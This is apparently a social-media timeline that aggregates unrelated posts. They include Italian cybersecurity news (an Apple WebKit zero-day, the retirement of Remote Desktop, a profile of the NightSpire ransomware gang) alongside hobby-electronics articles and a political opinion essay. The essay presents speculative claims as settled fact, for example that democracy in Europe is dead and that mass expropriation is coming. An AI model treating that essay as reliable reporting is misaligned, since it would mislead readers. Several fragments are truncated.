Ti invitiamo a portare il tuo portatile con il sistema operativo che preferisci, così potrai partecipare attivamente agli esercizi insieme ai nostri esperti. Se qualche passaggio ti sfuggirà, nessun problema: tutti i workshop saranno registrati e disponibili sul nostro canale YouTube, così potrai rivederli quando vuoi, proprio come negli anni precedenti.
[strong][url=http://rhc-conference-2025-workshop.eventbrite.it/]Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio[/url][/strong]
Un’Esperienza Interattiva e Pratica
L’obiettivo non sarà quindi solo “passivo”, ma soprattutto “attivo”, per consentire ai ragazzi di toccare con mano qualcosa che da sempre hanno visto nei film pensando che fosse qualcosa di inarrivabile, attivando nelle loro avide voraci menti un interesse per queste specifiche materie che nessuno gli ha mai fatto provare da vicino.
A differenza delle edizioni precedenti, i workshop saranno concentrati esclusivamente nella giornata dell’8 maggio e offriranno ai partecipanti la possibilità di toccare con mano le tecnologie più innovative, grazie a diverse sessioni pratiche.
Porta il tuo laptop! In alcuni di questi workshop avrai la possibilità di mettere subito mano e provare nella pratica quanto appreso, sotto la guida di esperti del settore.
Programma della Giornata
Di seguito, il programma dettagliato dei workshop che verranno svolti nella giornata di giovedì 8 maggio (che potrete trovare anche nel programma completo della conference):
Perché Partecipare?
- Esperienza pratica: Non solo teoria, ma esercizi concreti per migliorare le tue competenze.
- Esperti del settore: Sessioni guidate da professionisti altamente qualificati.
- Approfondimenti unici: Temi cruciali come ethical hacking, privacy, intelligenza artificiale e cyberbullismo.
- Networking: Un’opportunità per connettersi con altri appassionati di cybersecurity.
Registrazione gratuita per i Workshop della giornata di Giovedì 8 Maggio
Registrati Subito!
L’ingresso ai Workshop Hands-on richiede una registrazione separata rispetto alla conferenza. Prenota il tuo posto qui: rhc-conference-2025-workshop.e…
Non perdere questa occasione per apprendere, sperimentare e metterti alla prova nel mondo della cybersecurity! Ci vediamo giovedì 8 maggio a Roma!
L'articolo Ragazzi, Pronti per i Workshop della RHC Conference? Scopriamo assieme Deepfake, AI, Darkweb, Ethical Hacking, Doxing e Cyberbullismo proviene da il blog della sicurezza informatica.
freezonemagazine.com/news/cesa…
In libreria dal 14 marzo 2025 Eco è la storia di una ragazza che sogna, e del suo sogno che riceve un’interpretazione diversa da ciascuno dei personaggi a cui lei lo racconta. Il fluire dei loro pensieri porta con sé altre storie, le trame delle loro esistenze, che appaiono a noi che leggiamo come frammenti […]
L'articolo Cesare Sinatti – Eco proviene da FREE ZONE MAGAZINE.
In libreria dal 14 marzo 2025 Eco è la
Leonardo, Rheinmetall e Thales nel nuovo Etf di WisdomTree dedicato alla Difesa europea
@Notizie dall'Italia e dal mondo
L’attenzione verso la difesa europea ha registrato un’accelerazione significativa sui mercati finanziari. WisdomTree, società di gestione patrimoniale specializzata in Etf, ha lanciato il WisdomTree Europe Defence Ucits Etf (Wdef), un fondo che
Notizie dall'Italia e dal mondo reshared this.
Con il voto favorevole del parlamento europeo al piano di riarmo (419 SI, 204 NO, 46 astenuti) credo si possa dire che, simbolicamente, con oggi, la democrazia in Europa è un ricordo; appassita prima, oggi i petali secchi sono caduti.
Non è stata sostituita, come molti temevano, da una dittatura.
La storia prende sempre forme diverse e sorprendenti.
No, questa volta la democrazia è stata sopraffatta dalla conquista delle istituzioni e dei media, dall'interno, da parte dell'oligarchia finanziaria e dei suoi stipendiati.
Oramai la manovra di aggiramento è compiuta.
I canali a disposizione per la popolazione per esprimersi in termini politicamente significativi sono stati tutti o chiusi o neutralizzati. Un po' è avvenuto con modifiche delle leggi elettorali, un po' rendendo il processo democratico contendibile solo a chi aveva finanziamenti significativi a disposizione, un po' occupando a tutti i livelli il sistema mediatico (ed espellendo chi non si adeguava a scrivere sotto dettatura), un po' sopprimendo la terzietà della magistratura, capillarmente politicizzata.
Ora i colpi possono susseguirsi in maniera progressivamente sempre più violenta e sfacciata. Aggirare con decreti le discussioni parlamentari è già e sarà sempre più la nuova normalità. Come lo è impedire agli outsider di partecipare al dibattito pubblico prima, ai processi elettorali poi.
Che sia stato progettato così o semplicemente avvenuto, de facto la vicenda pandemica ha rappresentato le prove generali della militarizzazione della società e dell'informazione: una sorta di legge marziale senza guerra.
Questa svolta era stata preceduta da molti passi intermedi, da molte lamentele intorno all'inefficienza dei tempi della politica, dei rituali della democrazia.
Poi, dal 2022 la guerra russo-ucraina è divenuta l'occasione per ribadire gli ultimi chiodi sulla bara della democrazia.
D'ora in poi aspettiamoci che i passaggi diventino sempre più veloci.
Tra la grande espropriazione di risorse pubbliche della crisi subprime (2008-2011) e la grande espropriazione di risorse pubbliche della crisi Covid (2020-2022) erano passati una decina d'anni. Ora, e sono passati solo 3 anni, si passa ad una terza colossale espropriazione nel nome dell'emergenza bellica.
L'esito di questo passaggio è trasparente e chiarissimo.
Pilastri sociali fondamentali come il sistema sanitario e il sistema pensionistico verranno stroncati.
Per parare il colpo gran parte del residuo risparmio privato verrà drenato dai cittadini in beni difensivi (assicurazioni private, pensioni private, ecc.).
Il patrimonio immobiliare privato, dove, come in Italia, ancora rilevante, diverrà dapprima il collaterale necessario per l'erogazione di finanziamenti indispensabili per far fronte ad esigenze inderogabili (la salute, lo studio dei figli, la sopravvivenza una volta usciti dalla sfera produttiva).
L'ultimo passo sarà naturalmente la sottrazione stessa delle proprietà immobiliari, che diventeranno invece il collaterale per le erogazioni di prestiti ad interesse da parte dei gruppi finanziari.
Alla fine del processo una cittadinanza variamente indebitata sarà di fatto in catene anche se formalmente libera: condizionata e ricattabile ad ogni passo. Fine pena, mai.
L'indebitamento economico irreversibile sarà la nuova forma della coazione. Non più gli antiquati modelli dell'asservimento violento, della schiavitù, ma un sistema pulito, contrattualmente ineccepibile, e tuttavia assai più stringente e dettagliato di qualunque passato rapporto servo-padrone.
Se poi con questa leva si deciderà di mandare debitori/colpevoli (Schuld) a fare la carne fresca in guerra o l'ingranaggio a vita per una multinazionale, questi saranno dettagli.
Questo è il futuro che bussa alle porte, e gli spiragli in cui si presentano ancora possibili margini di reazione - posto che ancora ci siano - si vanno chiudendo rapidamente.
Andrea Zhok
A Decade Resistance Box From PCBs
One of those useful things to have around on your bench is a decade resistance box, essentially a dial-a-resistance instrument. They used to be quite expensive in line with the cost of close-tolerance resistors, but the prices have come down and it’s within reach to build your own. Electronic design consultancy Dekimo have a nice design for one made from a series of PCBs which they normally give out at trade fairs, but now they’ve released the files for download.
It’s released as Gerbers and BOM with a pick-and-place file only, and there’s no licence so it’s free-as-in-beer, but that should be enough if you fancy a go. Our Gerber viewer is playing up so we’re not entirely sure how reliable using PCBs as wafer switches will be long-term, but since the pictures are all ENIG boards we’d guess the gold plating will be much better than the HASL on all those cheap multimeters.
We like this as a conference giveaway, being used to badges it’s refreshing to see a passive take on a PCB artwork. Meanwhile this isn’t the first resistance box we’ve seen with unconventional switches.
Mi ha salutato il signor Sulu, mi ha chiamato "amico".
Che giornata meravigliosa 🥹🥹🥹🥹🥹🥹🥹
freezonemagazine.com/rubriche/…
Il pullman che ospita i musicisti della Royal Company Band di Little Richard è pronto a partire per un lungo viaggio che li porterà a New York dove al teatro Apollo è programmato un concerto dell’Architetto del Rock and Roll. Al momento di avviarsi il tour manager si accorge che manca il chitarrista Jimi che […]
L'articolo Questo palco è troppo piccolo per due proviene da FREE
“Hanno Rubato la Mia Vita” – La Storia Choc di una Vittima del Cybercrime
Viviamo in un’epoca in cui la nostra vita digitale è profondamente intrecciata con quella reale. Social network, e-commerce, home banking: ogni giorno lasciamo tracce online senza nemmeno rendercene conto. Ma cosa succede quando queste informazioni finiscono nelle mani sbagliate?
Il cybercrime non è un problema solo per aziende e governi. È un pericolo che può colpire chiunque abbia un telefono, un account social o un conto bancario online. Oggi raccontiamo la storia di chi ha perso tutto, e la cosa più spaventosa è che potrebbe accadere a chiunque di noi!
Il Risveglio in un Incubo
Immagina di svegliarti una mattina e trovare centinaia di notifiche sul telefono. Amici, colleghi e parenti ti scrivono preoccupati: “Va tutto bene?”
L’ansia cresce mentre apri il tuo profilo social. Il tuo volto è ancora lì, ma qualcosa non torna. Il tuo nome è accostato a contenuti compromettenti. Messaggi falsificati, conversazioni che non hai mai avuto, foto private che credevi al sicuro… tutto esposto.
E poi il colpo di grazia: il tuo indirizzo, il tuo numero di telefono, i nomi dei tuoi familiari sono stati pubblicati online. Sei diventato un bersaglio.
Forse pensi: “Perché proprio a me?”. La risposta è inquietante: non serve un motivo.
Potresti essere stato scelto a caso. Magari i tuoi dati sono finiti in un database violato, oppure hai cliccato su un link malevolo, convinto che fosse una comunicazione della tua banca. Oppure, peggio ancora, qualcuno ha deciso di rovinarti la vita per vendetta, per soldi… o per puro divertimento.
Il Ricatto Invisibile
Quando la tua identità viene rubata, il panico si trasforma in disperazione. Cerchi di reagire, ma più provi a difenderti, più la situazione peggiora. I cybercriminali sanno come manipolarti, facendoti sentire impotente.
E poi arriva il messaggio: “Se vuoi che tutto sparisca, segui le istruzioni.”
Il ricatto è la loro arma. Ti chiedono di pagare in criptovaluta, di cedere i tuoi account, di fornire informazioni riservate. Ma a volte non vogliono solo soldi. Vogliono te.
Alcune vittime vengono costrette a rubare dati per loro, a installare malware sui dispositivi di altri, a partecipare a truffe online. Ti spezzano psicologicamente, ti fanno dubitare di te stesso.
E tutto è iniziato con un solo click. Si Può Uscire da Questo Incubo?
Alcune vittime decidono di denunciare, altre pagano nella speranza che finisca tutto lì. Ma il problema è molto più profondo.
Perché accade? Perché siamo esposti. Perché sottovalutiamo il valore delle informazioni che lasciamo online.
Come Proteggersi
Ecco alcune regole fondamentali di prevenzione:
- Limitare le informazioni personali online: Nome completo, indirizzo, abitudini quotidiane… tutto può essere usato contro di te.
- Riconoscere i segnali di pericolo: Notifiche insolite, email sospette, movimenti strani nei tuoi account sono campanelli d’allarme.
- Essere vigili: Se pensi che non possa succedere a te, sei la vittima perfetta.
Nessuno è al sicuro al 100%, ma la differenza tra una vittima e una persona protetta è la consapevolezza.
Conclusione
Immagina di essere in una stanza buia. Sei solo. Ma da qualche parte, qualcuno sa chi sei. Sa dove vivi. Sa cosa ami e chi ami. E il tuo nome è in vendita.
Il dark web non è un luogo lontano. È a un solo click di distanza. E se non stai attento, quel click potrebbe costarti tutto.
Proteggiti. Perché una volta che la tua vita non è più tua… riaverla indietro è quasi impossibile.
L'articolo “Hanno Rubato la Mia Vita” – La Storia Choc di una Vittima del Cybercrime proviene da il blog della sicurezza informatica.
Apple sotto attacco: grave vulnerabilità zero-day utilizzata dagli Spyware! Aggiorna subito!
Apple ha rilasciato aggiornamenti di sicurezza per risolvere una vulnerabilità zero-day nel motore del suo WebKit, identificata come CVE-2025-24201, che è stata sfruttata attivamente in attacchi mirati.
WebKit è un motore per browser web utilizzato per il rendering delle pagine web. Il progetto WebKit è stato creato da Apple il 25 giugno 2001. Viene rilasciato con licenza BSD 2-Clause. La base mondiale installata ammonta alla quota di circa il 50.3% di tutti i browsers.
“I contenuti web creati in modo dannoso potrebbero essere in grado di uscire dal sandbox dei contenuti web. Un problema di scrittura fuori dai limiti è stato risolto con controlli migliorati per prevenire azioni non autorizzate”. Ha affermato Apple in un suo bollettino di sicurezza.
Apple non ha divulgato dettagli riguardanti la scoperta del difetto, le identità degli aggressori o le vittime prese di mira. Si consiglia vivamente agli utenti di aggiornare immediatamente i propri dispositivi per mitigare i potenziali rischi associati a questa vulnerabilità.
La vulnerabilità riguarda un’ampia gamma di prodotti Apple, tra cui:
- iOS 18.3.2 e iPadOS 18.3.2 : disponibili per iPhone XS e modelli successivi, iPad Pro da 13 pollici, iPad Pro da 12,9 pollici (3a generazione e successive), iPad Pro da 11 pollici (1a generazione e successive), iPad Air (3a generazione e successive), iPad (7a generazione e successive) e iPad mini (5a generazione e successive).
- macOS Sequoia 15.3.2 : applicabile ai Mac che eseguono macOS Sequoia.
- Safari 18.3.1 : disponibile per macOS Ventura e macOS Sonoma.
- visionOS 2.3.2 : per Apple Vision Pro.
- tvOS 18.3.1 : rilasciato specificatamente per Apple TV 4K (3a generazione), anche se questo aggiornamento non ha voci CVE pubblicate.
L’avviso di sicurezza di Apple ha osservato che la vulnerabilità “potrebbe essere stata sfruttata in un attacco estremamente sofisticato contro specifici individui mirati su versioni di iOS precedenti a iOS 17.2”.
L’azienda ha implementato controlli migliorati per prevenire azioni non autorizzate, contrassegnando questa versione come una correzione supplementare in seguito a una precedente mitigazione fornita nell’aggiornamento iOS 17.2.
Questa ultima patch è la terza risposta di Apple alle vulnerabilità zero-day sfruttate attivamente quest’anno, dopo le precedenti patch per CVE-2025-24085 a gennaio e CVE-2025-24200 a febbraio.
L'articolo Apple sotto attacco: grave vulnerabilità zero-day utilizzata dagli Spyware! Aggiorna subito! proviene da il blog della sicurezza informatica.
Addio a Microsoft Remote Desktop! Ecco cosa cambia dal 27 maggio 2025!
Un cambiamento significativo in casa Microsoft: il colosso di Redmond ha annunciato che a partire dal 27 maggio 2025 la storica applicazione Remote Desktop, scaricabile dal Microsoft Store, verrà ufficialmente dismessa e sostituita dalla nuova Windows App.
Una transizione senza alternative
Se fino ad oggi gli utenti si affidavano a Remote Desktop per connettersi a Windows 365, Azure Virtual Desktop e Microsoft Dev Box, dopo il 27 maggio questa opzione verrà completamente bloccata. Microsoft ha infatti dichiarato che l’app Remote Desktop cesserà di funzionare, rendendo obbligatorio il passaggio alla nuova soluzione.
Chi non ha ancora familiarizzato con la Windows App dovrà adeguarsi rapidamente, ma c’è un problema: non tutte le funzionalità sono ancora supportate!
Windows App: un passaggio ancora incompleto
La Windows App nasce con l’obiettivo di offrire un’esperienza unificata per gli utenti business e scolastici, permettendo la connessione a:
- Azure Virtual Desktop
- Windows 365
- Microsoft Dev Box
- Remote Desktop Services (ma non su Windows)
- PC remoti (con limitazioni!)
Nonostante lo sviluppo pluriennale e il lancio ufficiale a settembre 2024, la Windows App presenta ancora limitazioni significative. Su Windows, non supporta né Remote Desktop Services né le connessioni Remote PC, mentre ironicamente queste funzioni sono disponibili su macOS, iOS/iPadOS, Android, Chrome OS, web e persino su Meta Quest!
Quali sono le alternative per gli utenti?
Microsoft ha fornito alcune soluzioni temporanee per gli utenti che perderanno l’accesso a Remote Desktop:
- Per chi utilizza Remote Desktop Services, l’azienda consiglia di usare RemoteApp e Desktop Connection fino a quando il supporto non sarà integrato in Windows App.
- Per chi ha bisogno di accedere a desktop remoti, la soluzione è tornare alla storica applicazione integrata in Windows: Remote Desktop Connection. Basta cercarla nel menu Start, inserire il nome del PC remoto e avviare la connessione.
Conclusione
Microsoft sta accelerando il passaggio verso soluzioni cloud-first, ma la transizione non è priva di ostacoli. La rimozione di Remote Desktop obbligherà molte aziende e professionisti a rivedere le proprie strategie di accesso remoto, spesso senza un’alternativa immediata.
Resta da capire quando e se la nuova Windows App riuscirà a colmare queste lacune. Per ora, gli utenti dovranno adattarsi e sperare che Microsoft acceleri gli aggiornamenti.
L'articolo Addio a Microsoft Remote Desktop! Ecco cosa cambia dal 27 maggio 2025! proviene da il blog della sicurezza informatica.
Arriva NightSpire! Un Nuovo Attore nel Panorama del Ransomware
Nelle ricognizioni nel mondo dell’underground e dei gruppi criminali svolte dal laboratorio di intelligence delle minacce DarkLab di Red Hot Cyber, ci siamo imbattuti all’interno di un Data Leak Site di una cyber gang mai monitorata prima: NightSpire.
Si tratta di un nuovo gruppo ransomware che sembra essersi affacciato recentemente sulla scena del cybercrime. Sebbene non si abbiano informazioni pregresse su questo attore, l’analisi del loro data leak site (DLS) e della loro comunicazione fornisce alcuni indizi chiave sulla loro strategia e modalità operative.
Il gruppo si autodefinisce come una minaccia inarrestabile per le aziende e promette di sfruttare ogni vulnerabilità a loro vantaggio. Di seguito, analizziamo i dettagli del loro portale e le possibili implicazioni della loro attività.
NightSpire: Identità e Dichiarazioni Pubbliche
La sezione “About” del sito di NightSpire contiene un messaggio intimidatorio, tipico dei gruppi ransomware che cercano di diffondere il terrore tra le aziende. Il linguaggio utilizzato richiama quello di attori ben noti come BlackCat, LockBit e Conti, sottolineando la loro intenzione di colpire organizzazioni vulnerabili e minacciarle per ottenere un riscatto.
Testo dalla sezione “About”:
“NightSpire, gli architetti ombra del caos digitale, prosperano distruggendo la sacralità delle fortezze aziendali. Con precisione spietata, infiltriamo i più profondi depositi di dati, senza lasciare alcun byte intatto. Temeteci, perché NightSpire è l’araldo della vostra rovina, la mano invisibile che sfrutterà ogni vostra vulnerabilità finché non vi inginocchierete davanti alle nostre richieste.”
Questa retorica è un chiaro segnale di cyber-intimidazione, che mira a rafforzare l’immagine del gruppo come una minaccia inarrestabile e a destabilizzare le vittime.
Analisi del Data Leak Site (DLS)
NightSpire utilizza un data leak site per pubblicare informazioni sulle aziende compromesse, un modus operandi ormai comune nei gruppi ransomware. Il portale presenta una sezione “Databases”, dove vengono elencate le vittime, con dettagli su:
- Data dell’attacco
- Data della pubblicazione del leak
- Dimensione dei dati esfiltrati
- Paese della vittima
Dalle immagini analizzate, si possono notare alcune aziende colpite:
Alcuni di questi leak risultano ancora in conto alla rovescia, suggerendo che il gruppo segue la strategia del double extortion: minaccia di pubblicare i dati rubati se il riscatto non viene pagato. Quando il timer raggiunge lo zero, i dati vengono resi pubblici.
Questa tecnica viene utilizzata per esercitare ulteriore pressione sulle vittime, inducendole a pagare per evitare danni alla reputazione e perdite di dati sensibili.
Struttura di Contatto e Canale Telegram
NightSpire offre diversi metodi di contatto attraverso la sua pagina dedicata. Oltre alle classiche email su servizi ProtonMail e OnionMail, hanno anche un canale su Telegram, utilizzato spesso dai gruppi ransomware per comunicare aggiornamenti sui leak, negoziare riscatti e fornire istruzioni alle vittime.
Metodi di contatto identificati:
- Contact Form
- Telegram
Il canale Telegram è probabilmente utilizzato per annunciare nuovi attacchi, interagire con le vittime e gestire le comunicazioni con potenziali affiliati o venditori di dati.
Caratterizzazione del Gruppo
Sebbene non si abbiano ancora informazioni dettagliate sulla loro provenienza o sulle loro tecniche di attacco, alcuni elementi suggeriscono che NightSpire potrebbe essere un gruppo emergente con forti influenze dai modelli RaaS (Ransomware-as-a-Service) già esistenti.
Possibili caratteristiche operative:
- Utilizzo del doppio ricatto (Double Extortion)
- Portale DLS con timer per il rilascio dati
- Canale Telegram per comunicazioni
- Target su aziende di diverse regioni globali
- Estetica e comunicazione simili a gruppi ransomware avanzati
Se si tratta di un nuovo gruppo indipendente o di un rebrand di un attore già esistente è ancora da determinare.
Conclusioni e Considerazioni Finali
NightSpire si presenta come una nuova minaccia nel panorama ransomware. L’assenza di riferimenti a gruppi preesistenti rende difficile tracciare una linea diretta con attori noti, ma il loro modus operandi è chiaramente ispirato a tecniche già collaudate.
Le aziende devono adottare strategie di cyber resilience, rafforzando la protezione degli endpoint, implementando piani di risposta agli incidenti e migliorando la formazione del personale per mitigare il rischio di compromissioni.
Continueremo a monitorare NightSpire per identificare le loro tattiche e procedure operative, valutando il loro impatto nel cybercrime globale.
L'articolo Arriva NightSpire! Un Nuovo Attore nel Panorama del Ransomware proviene da il blog della sicurezza informatica.
Meshtastic Adds Wireless Connectivity to Possum Trap
Perhaps every gardener to attempt to grow a tomato, lettuce, or bean has had to contend with animals trying to enjoy the food before the gardener themselves can, whether it’s a groundhog, rabbit, mouse, crow, or even iguana. There are numerous ways to discourage these mischievous animals from foraging the garden beds including traps, but these devices have their downsides as well. False alarms can be a problem as well as trapping animals that will be overly aggravated to be inside the trap (like skunks) and while the latter problem can’t easily be solved by technology, the former can with the help of Meshtastic.
[Norman Jester]’s problem was an errant possum, but these nocturnal animals generally come out while humans are asleep, and other nighttime animals like rats can activate the trap and then escape. To help with this, a Meshtastic node was added to the San Diego mesh using a 3.5mm audio jack as a detector. When the trap is activated, the closing door yanks a plug out of the jack, alerting the node that the trap has been closed. If it’s a false alarm the trap can be easily and quickly reset, and if a possum has found its way in then it can be transported to a more suitable home the next day.
It’s worth noting that American possums (distinct from the Australian animals of the same name) are an often-misunderstood animal that generally do more good than harm. They help to control Lyme disease, eat a lot of waste that other animals won’t, don’t spread rabies, and don’t cause nearly as much disruption to human life as other animals like feral cats or raccoons. But if one is upsetting a garden or another type of animal is causing a disturbance, this Meshtastic solution does help solve some of the problems with live traps. For smaller animals, though, take a look at this Arudino-powered trap instead.
Thanks to [Dadsrcworkbench] for the tip!
youtube.com/embed/prx-Bxpf7RU?…
A Fast Rewind to the Era of Tapesponding
Imagine a time before Discord servers and cheap long-distance calls. Back in the 1950s, a curious and crafty group of enthusiasts invented their own global social network: on reels of magnetic tape. They called it tapesponding (short for tape corresponding), and it was a booming hobby for thousands of radio hams, tinkerers, and audio geeks. Here’s the original video on this analog marvel.
These folks weren’t just swapping mixtapes. They crafted personal audio letters, beamed across the globe on 3-inch reels. DIY clubs emerged everywhere: World Tape Pals (Texas-based, naturally) clocked 5,000 members from “every Free Nation” – which frames it in a world in terms of East vs. West. Some groups even pooled funds to buy shared tape decks in poorer regions – pure hacker spirit. The tech behind it: Speeds of 3¾ IPS, half-track mono, round-robin reels, and rigorous trust networks to avoid ghosters. Honestly, it makes IRC net ops look soft. Tapesponding wasn’t just for chatty types. It fostered deep friendships, even marriages. It was social engineering before that term was coined. The video is below the break.
What are your thoughts on this nostalgic way of long-distance communication? The warm whirring of a spinning tape reel? The waiting time before your echo is returned? Or are have you skipped all the analog mechanics and shouted out into the LoRaWAN void long ago?
youtube.com/embed/4t9H14XfkPc?…
EPROM-based Enigma Machine
The Enigma machine is perhaps one of the most legendary devices to come out of World War II. The Germans used the ingenious cryptographic device to hide their communications from the Allies, who in turn spent an incredible amount of time and energy in finding a way to break it. While the original Enigma was a complicated electromechanical contraption, [DrMattRegan] recently set out to show how its operation can be replicated with an EPROM.
The German Enigma machine was, for the time, an extremely robust way of coding messages. Earlier versions proved somewhat easy to crack, but subsequent machines added more and more complexity rendering them almost impenetrable. The basis of the system was a set of rotors which encrypted each typed letter to a different one based on the settings and then advanced one place in their rotation, ensuring each letter was encrypted differently than the last. Essentially this is a finite-state machine, something perfectly suited for an EPROM. With all of the possible combinations programmed in advance, an initial rotor setting can be inputted, and then each key press is sent through the Enigma emulator which encrypts the letter, virtually advances the rotors, and then moves to the next letter with each clock cycle.
[DrMattRegan]’s video, also linked below, goes into much more historical and technical detail on how these machines worked, as well as some background on the British bombe, an electromechanical device used for decoding encrypted German messages. The first programmable, electronic, digital computer called Colossus was also developed to break encrypted Enigma messages as well, demonstrating yet another technology that came to the forefront during WWII.
youtube.com/embed/yKOzgzsezyc?…
Thanks to [Clint] for the tip!
Massimo Max Giuliani
in reply to Massimo Max Giuliani • •aimee80
in reply to Massimo Max Giuliani • •Max su Poliverso 🇪🇺🇮🇹
in reply to Massimo Max Giuliani • •@Massimo Max Giuliani
Che voglia di tornare sul palco 😁
aimee80 likes this.
Massimo Max Giuliani
in reply to Max su Poliverso 🇪🇺🇮🇹 • •aimee80 likes this.